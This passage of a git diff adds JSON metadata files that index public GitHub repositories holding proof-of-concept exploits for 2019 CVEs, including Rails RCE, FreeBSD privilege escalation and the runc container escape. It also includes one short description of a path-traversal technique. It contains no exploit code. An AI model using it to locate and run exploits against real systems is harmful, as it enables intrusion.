"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 552810113, + "name": "CVE-2019-5418", + "full_name": "kailing0220\/CVE-2019-5418", + "owner": { + "login": "kailing0220", + "id": 115863969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115863969?v=4", + "html_url": "https:\/\/github.com\/kailing0220", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kailing0220\/CVE-2019-5418", + "description": "Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,我们可以通过修改访问某控制器的请求包,通过“…\/…\/…\/…\/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使得所要访问的文件被当做外部模板来解析。", + "fork": false, + "created_at": "2022-10-17T09:04:43Z", + "updated_at": "2023-01-13T12:24:23Z", + "pushed_at": "2022-10-17T09:17:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5420.json b/2019/CVE-2019-5420.json new file mode 100644 index 0000000000..87f0432128 --- /dev/null +++ b/2019/CVE-2019-5420.json @@ -0,0 +1,314 @@ +[ + { + "id": 176976251, + "name": "CVE-2019-5420", + "full_name": "knqyf263\/CVE-2019-5420", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2019-5420", + "description": "CVE-2019-5420 (Ruby on Rails)", + "fork": false, + "created_at": "2019-03-21T15:42:54Z", + "updated_at": "2023-02-17T03:06:47Z", + "pushed_at": "2019-03-21T23:52:48Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 178050921, + "name": "cve-2019-5420", + "full_name": "cved-sources\/cve-2019-5420", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2019-5420", + "description": "cve-2019-5420", + "fork": false, + "created_at": "2019-03-27T18:16:46Z", + "updated_at": "2021-04-15T22:54:41Z", + "pushed_at": "2023-01-19T12:16:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 328768715, + "name": "CVE-2019-5420", + "full_name": "AnasTaoutaou\/CVE-2019-5420", + "owner": { + "login": "AnasTaoutaou", + "id": 10848894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10848894?v=4", + "html_url": "https:\/\/github.com\/AnasTaoutaou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AnasTaoutaou\/CVE-2019-5420", + "description": null, + "fork": false, + "created_at": "2021-01-11T19:23:01Z", + "updated_at": "2021-01-11T19:24:33Z", + "pushed_at": "2021-01-11T19:24:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 331342400, + "name": "CVE-2019-5420", + "full_name": "Eremiel\/CVE-2019-5420", + "owner": { + "login": "Eremiel", + "id": 32537197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32537197?v=4", + "html_url": "https:\/\/github.com\/Eremiel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eremiel\/CVE-2019-5420", + "description": null, + "fork": false, + "created_at": "2021-01-20T15:06:58Z", + "updated_at": "2021-01-20T15:14:12Z", + "pushed_at": "2021-01-20T15:14:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 366358815, + "name": "CVE-2019-5420.rb", + "full_name": "scumdestroy\/CVE-2019-5420.rb", + "owner": { + "login": "scumdestroy", + "id": 35894688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35894688?v=4", + "html_url": "https:\/\/github.com\/scumdestroy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scumdestroy\/CVE-2019-5420.rb", + "description": "POC Exploit written in Ruby", + "fork": false, + "created_at": "2021-05-11T11:32:18Z", + "updated_at": "2024-03-30T12:55:53Z", + "pushed_at": "2022-01-12T02:39:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 403614421, + "name": "CVE-2019-5420", + "full_name": "j4k0m\/CVE-2019-5420", + "owner": { + "login": "j4k0m", + "id": 48088579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48088579?v=4", + "html_url": "https:\/\/github.com\/j4k0m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j4k0m\/CVE-2019-5420", + "description": "A vulnerability can allow an attacker to guess the automatically generated development mode secret token.", + "fork": false, + "created_at": "2021-09-06T12:28:05Z", + "updated_at": "2024-01-14T22:39:28Z", + "pushed_at": "2021-09-07T13:11:02Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 425154730, + "name": "CVE-2019-5420-RCE", + "full_name": "mmeza-developer\/CVE-2019-5420-RCE", + "owner": { + "login": "mmeza-developer", + "id": 20251063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20251063?v=4", + "html_url": "https:\/\/github.com\/mmeza-developer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mmeza-developer\/CVE-2019-5420-RCE", + "description": null, + "fork": false, + "created_at": "2021-11-06T04:24:43Z", + "updated_at": "2021-11-06T04:25:00Z", + "pushed_at": "2021-11-06T04:24:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469838090, + "name": "CVE-2019-5420", + "full_name": "trickstersec\/CVE-2019-5420", + "owner": { + "login": "trickstersec", + "id": 22165282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22165282?v=4", + "html_url": "https:\/\/github.com\/trickstersec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trickstersec\/CVE-2019-5420", + "description": "Exploit for the Rails CVE-2019-5420", + "fork": false, + "created_at": "2022-03-14T17:29:47Z", + "updated_at": "2022-03-14T17:43:03Z", + "pushed_at": "2022-03-14T17:46:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500379970, + "name": "CVE-2019-5420", + "full_name": "PenTestical\/CVE-2019-5420", + "owner": { + "login": "PenTestical", + "id": 57206134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57206134?v=4", + "html_url": "https:\/\/github.com\/PenTestical", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenTestical\/CVE-2019-5420", + "description": " Exploit in Rails Development Mode. With some knowledge of a target application it is possible for an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with other Rails internals to escalate to a remote code execution exploit.", + "fork": false, + "created_at": "2022-06-06T10:01:35Z", + "updated_at": "2023-02-19T12:43:46Z", + "pushed_at": "2022-06-06T10:16:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5420" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 509795175, + "name": "ruby-RCE-CVE-2019-5420-", + "full_name": "laffray\/ruby-RCE-CVE-2019-5420-", + "owner": { + "login": "laffray", + "id": 43429412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43429412?v=4", + "html_url": "https:\/\/github.com\/laffray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laffray\/ruby-RCE-CVE-2019-5420-", + "description": "Ruby反序列化命令执行漏洞(CVE-2019-5420)-vulfocus通关版", + "fork": false, + "created_at": "2022-07-02T15:44:03Z", + "updated_at": "2024-09-29T16:00:10Z", + "pushed_at": "2022-07-02T15:48:28Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5427.json b/2019/CVE-2019-5427.json new file mode 100644 index 0000000000..61d76d9dcf --- /dev/null +++ b/2019/CVE-2019-5427.json @@ -0,0 +1,33 @@ +[ + { + "id": 321055902, + "name": "cp30_XXE_partial_fix", + "full_name": "shanika04\/cp30_XXE_partial_fix", + "owner": { + "login": "shanika04", + "id": 73774345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4", + "html_url": "https:\/\/github.com\/shanika04", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanika04\/cp30_XXE_partial_fix", + "description": "version between CVE-2018-20433 and CVE-2019-5427", + "fork": false, + "created_at": "2020-12-13T12:08:30Z", + "updated_at": "2020-12-13T12:10:34Z", + "pushed_at": "2020-12-13T12:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5454.json b/2019/CVE-2019-5454.json new file mode 100644 index 0000000000..1870cdf7e8 --- /dev/null +++ b/2019/CVE-2019-5454.json @@ -0,0 +1,33 @@ +[ + { + "id": 319352277, + "name": "nextcloud_android", + "full_name": "shanika04\/nextcloud_android", + "owner": { + "login": "shanika04", + "id": 73774345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4", + "html_url": "https:\/\/github.com\/shanika04", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanika04\/nextcloud_android", + "description": "SQLi CVE-2019-5454", + "fork": false, + "created_at": "2020-12-07T14:53:25Z", + "updated_at": "2020-12-07T15:01:34Z", + "pushed_at": "2020-12-07T15:01:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5475.json b/2019/CVE-2019-5475.json new file mode 100644 index 0000000000..0e5d663d97 --- /dev/null +++ b/2019/CVE-2019-5475.json @@ -0,0 +1,100 @@ +[ + { + "id": 210890120, + "name": "CVE-2019-5475-Nexus-Repository-Manager-", + "full_name": "jaychouzzk\/CVE-2019-5475-Nexus-Repository-Manager-", + "owner": { + "login": "jaychouzzk", + "id": 45549315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45549315?v=4", + "html_url": "https:\/\/github.com\/jaychouzzk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jaychouzzk\/CVE-2019-5475-Nexus-Repository-Manager-", + "description": null, + "fork": false, + "created_at": "2019-09-25T16:22:56Z", + "updated_at": "2024-08-12T19:53:21Z", + "pushed_at": "2019-09-25T16:33:53Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 255116667, + "name": "CVE-2019-5475-EXP", + "full_name": "rabbitmask\/CVE-2019-5475-EXP", + "owner": { + "login": "rabbitmask", + "id": 37649548, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37649548?v=4", + "html_url": "https:\/\/github.com\/rabbitmask", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rabbitmask\/CVE-2019-5475-EXP", + "description": "CVE-2019-5475-EXP 【Nexus Repository Manager 2.x远程命令执行漏洞】", + "fork": false, + "created_at": "2020-04-12T15:49:36Z", + "updated_at": "2024-08-12T20:00:04Z", + "pushed_at": "2020-04-12T15:59:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 322000482, + "name": "CVE-2019-5475", + "full_name": "EXP-Docs\/CVE-2019-5475", + "owner": { + "login": "EXP-Docs", + "id": 132466462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132466462?v=4", + "html_url": "https:\/\/github.com\/EXP-Docs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EXP-Docs\/CVE-2019-5475", + "description": "CVE-2019-5475 靶场: RCE 命令注入漏洞", + "fork": false, + "created_at": "2020-12-16T14:03:16Z", + "updated_at": "2023-05-29T02:49:38Z", + "pushed_at": "2023-01-24T10:35:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-15588", + "cve-2019-5475", + "learning" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5489.json b/2019/CVE-2019-5489.json new file mode 100644 index 0000000000..6f13fd222a --- /dev/null +++ b/2019/CVE-2019-5489.json @@ -0,0 +1,37 @@ +[ + { + "id": 226253609, + "name": "CVE-2019-5489", + "full_name": "mmxsrup\/CVE-2019-5489", + "owner": { + "login": "mmxsrup", + "id": 19609323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19609323?v=4", + "html_url": "https:\/\/github.com\/mmxsrup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mmxsrup\/CVE-2019-5489", + "description": "Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux", + "fork": false, + "created_at": "2019-12-06T05:37:08Z", + "updated_at": "2022-07-05T07:20:44Z", + "pushed_at": "2021-10-02T00:15:11Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "linux", + "poc", + "vulnaribility" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5544.json b/2019/CVE-2019-5544.json new file mode 100644 index 0000000000..9d92ead7fb --- /dev/null +++ b/2019/CVE-2019-5544.json @@ -0,0 +1,71 @@ +[ + { + "id": 317555828, + "name": "CVE-2019-5544_CVE-2020-3992", + "full_name": "HynekPetrak\/CVE-2019-5544_CVE-2020-3992", + "owner": { + "login": "HynekPetrak", + "id": 8593983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4", + "html_url": "https:\/\/github.com\/HynekPetrak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HynekPetrak\/CVE-2019-5544_CVE-2020-3992", + "description": "Python \/ scapy module implementing SRVLOC\/SLP protocol and scans for enabled OpenSLP services.", + "fork": false, + "created_at": "2020-12-01T13:49:26Z", + "updated_at": "2024-11-05T07:49:25Z", + "pushed_at": "2023-02-07T07:56:20Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5544", + "cve-2020-3992", + "cve-2021-21974", + "openslp", + "slp", + "srvloc" + ], + "visibility": "public", + "forks": 12, + "watchers": 47, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 335992894, + "name": "VMware_ESXI_OpenSLP_PoCs", + "full_name": "dgh05t\/VMware_ESXI_OpenSLP_PoCs", + "owner": { + "login": "dgh05t", + "id": 55125726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55125726?v=4", + "html_url": "https:\/\/github.com\/dgh05t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgh05t\/VMware_ESXI_OpenSLP_PoCs", + "description": "CVE-2020-3992 & CVE-2019-5544", + "fork": false, + "created_at": "2021-02-04T15:15:22Z", + "updated_at": "2024-11-20T09:00:47Z", + "pushed_at": "2021-02-05T06:40:50Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 63, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5596.json b/2019/CVE-2019-5596.json new file mode 100644 index 0000000000..279246c274 --- /dev/null +++ b/2019/CVE-2019-5596.json @@ -0,0 +1,33 @@ +[ + { + "id": 620735388, + "name": "CVE-2019-5596", + "full_name": "raymontag\/CVE-2019-5596", + "owner": { + "login": "raymontag", + "id": 106421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106421?v=4", + "html_url": "https:\/\/github.com\/raymontag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raymontag\/CVE-2019-5596", + "description": "Full LPE Exploit for CVE-2019-5596 \/ FreeBSD-SA-19:02.fd", + "fork": false, + "created_at": "2023-03-29T09:15:07Z", + "updated_at": "2023-04-10T13:58:48Z", + "pushed_at": "2023-03-29T09:15:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5603.json b/2019/CVE-2019-5603.json new file mode 100644 index 0000000000..3685aaf2e4 --- /dev/null +++ b/2019/CVE-2019-5603.json @@ -0,0 +1,33 @@ +[ + { + "id": 620736173, + "name": "CVE-2019-5603", + "full_name": "raymontag\/CVE-2019-5603", + "owner": { + "login": "raymontag", + "id": 106421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106421?v=4", + "html_url": "https:\/\/github.com\/raymontag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raymontag\/CVE-2019-5603", + "description": "Full LPE Exploit for CVE-2019-5603 \/ FreeBSD-SA-19:15.mqueuefs \/ FreeBSD-SA-19:24.mqueuefs", + "fork": false, + "created_at": "2023-03-29T09:17:02Z", + "updated_at": "2023-04-10T13:58:26Z", + "pushed_at": "2023-03-29T09:19:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5624.json b/2019/CVE-2019-5624.json new file mode 100644 index 0000000000..978ff64863 --- /dev/null +++ b/2019/CVE-2019-5624.json @@ -0,0 +1,41 @@ +[ + { + "id": 184600046, + "name": "CVE-2019-5624", + "full_name": "VoidSec\/CVE-2019-5624", + "owner": { + "login": "VoidSec", + "id": 5717603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5717603?v=4", + "html_url": "https:\/\/github.com\/VoidSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoidSec\/CVE-2019-5624", + "description": "A proof of concept for Metasploit's CVE-2019-5624 vulnerability (Rubyzip insecure ZIP handling RCE) ", + "fork": false, + "created_at": "2019-05-02T14:54:08Z", + "updated_at": "2024-08-12T19:48:30Z", + "pushed_at": "2019-05-02T15:15:51Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5624", + "exploit", + "metasploit", + "metasploit-framework", + "poc", + "rce", + "rubyzip" + ], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5630.json b/2019/CVE-2019-5630.json new file mode 100644 index 0000000000..befe9e9b69 --- /dev/null +++ b/2019/CVE-2019-5630.json @@ -0,0 +1,33 @@ +[ + { + "id": 232403416, + "name": "CVE-2019-5630", + "full_name": "rbeede\/CVE-2019-5630", + "owner": { + "login": "rbeede", + "id": 1429214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1429214?v=4", + "html_url": "https:\/\/github.com\/rbeede", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbeede\/CVE-2019-5630", + "description": "https:\/\/www.rodneybeede.com\/curriculum%20vitae\/bio.html", + "fork": false, + "created_at": "2020-01-07T19:43:42Z", + "updated_at": "2020-01-07T19:44:19Z", + "pushed_at": "2020-01-07T19:44:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5700.json b/2019/CVE-2019-5700.json new file mode 100644 index 0000000000..5089312e42 --- /dev/null +++ b/2019/CVE-2019-5700.json @@ -0,0 +1,33 @@ +[ + { + "id": 226178220, + "name": "CVE-2019-5700", + "full_name": "oscardagrach\/CVE-2019-5700", + "owner": { + "login": "oscardagrach", + "id": 17905072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17905072?v=4", + "html_url": "https:\/\/github.com\/oscardagrach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oscardagrach\/CVE-2019-5700", + "description": "CVE-2019-5700", + "fork": false, + "created_at": "2019-12-05T19:54:33Z", + "updated_at": "2021-08-11T05:11:10Z", + "pushed_at": "2019-12-05T21:36:42Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5736.json b/2019/CVE-2019-5736.json new file mode 100644 index 0000000000..6814d239e5 --- /dev/null +++ b/2019/CVE-2019-5736.json @@ -0,0 +1,850 @@ +[ + { + "id": 170398859, + "name": "cve-2019-5736-poc", + "full_name": "q3k\/cve-2019-5736-poc", + "owner": { + "login": "q3k", + "id": 315234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/315234?v=4", + "html_url": "https:\/\/github.com\/q3k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/q3k\/cve-2019-5736-poc", + "description": "Unweaponized Proof of Concept for CVE-2019-5736 (Docker escape)", + "fork": false, + "created_at": "2019-02-12T22:07:47Z", + "updated_at": "2024-08-12T19:45:46Z", + "pushed_at": "2019-02-20T15:35:34Z", + "stargazers_count": 207, + "watchers_count": 207, + "has_discussions": false, + "forks_count": 67, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 67, + "watchers": 207, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 170445833, + "name": "CVE-2019-5736-PoC", + "full_name": "Frichetten\/CVE-2019-5736-PoC", + "owner": { + "login": "Frichetten", + "id": 10386884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10386884?v=4", + "html_url": "https:\/\/github.com\/Frichetten", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Frichetten\/CVE-2019-5736-PoC", + "description": "PoC for CVE-2019-5736", + "fork": false, + "created_at": "2019-02-13T05:26:32Z", + "updated_at": "2024-11-19T09:37:59Z", + "pushed_at": "2022-01-05T04:09:42Z", + "stargazers_count": 640, + "watchers_count": 640, + "has_discussions": false, + "forks_count": 163, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 163, + "watchers": 640, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 170613828, + "name": "CVE-2019-5736", + "full_name": "jas502n\/CVE-2019-5736", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-5736", + "description": "runc容器逃逸漏洞预警", + "fork": false, + "created_at": "2019-02-14T02:30:12Z", + "updated_at": "2023-12-15T12:10:28Z", + "pushed_at": "2019-02-14T02:40:55Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 170656576, + "name": "CVE-2019-5736", + "full_name": "likekabin\/CVE-2019-5736", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2019-5736", + "description": null, + "fork": false, + "created_at": "2019-02-14T08:37:25Z", + "updated_at": "2022-09-26T09:51:14Z", + "pushed_at": "2019-02-14T08:37:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 170656601, + "name": "cve-2019-5736-poc", + "full_name": "likekabin\/cve-2019-5736-poc", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/cve-2019-5736-poc", + "description": null, + "fork": false, + "created_at": "2019-02-14T08:37:39Z", + "updated_at": "2019-02-14T08:37:49Z", + "pushed_at": "2019-02-14T08:37:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 170836971, + "name": "cve-2019-5736-poc", + "full_name": "agppp\/cve-2019-5736-poc", + "owner": { + "login": "agppp", + "id": 10527860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10527860?v=4", + "html_url": "https:\/\/github.com\/agppp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/agppp\/cve-2019-5736-poc", + "description": "getshell test", + "fork": false, + "created_at": "2019-02-15T09:22:27Z", + "updated_at": "2024-08-12T19:45:50Z", + "pushed_at": "2019-02-15T09:49:46Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 171499608, + "name": "poc-cve-2019-5736", + "full_name": "b3d3c\/poc-cve-2019-5736", + "owner": { + "login": "b3d3c", + "id": 46558799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46558799?v=4", + "html_url": "https:\/\/github.com\/b3d3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b3d3c\/poc-cve-2019-5736", + "description": null, + "fork": false, + "created_at": "2019-02-19T15:34:18Z", + "updated_at": "2019-06-04T10:53:26Z", + "pushed_at": "2019-02-19T15:37:34Z", + "stargazers_count": 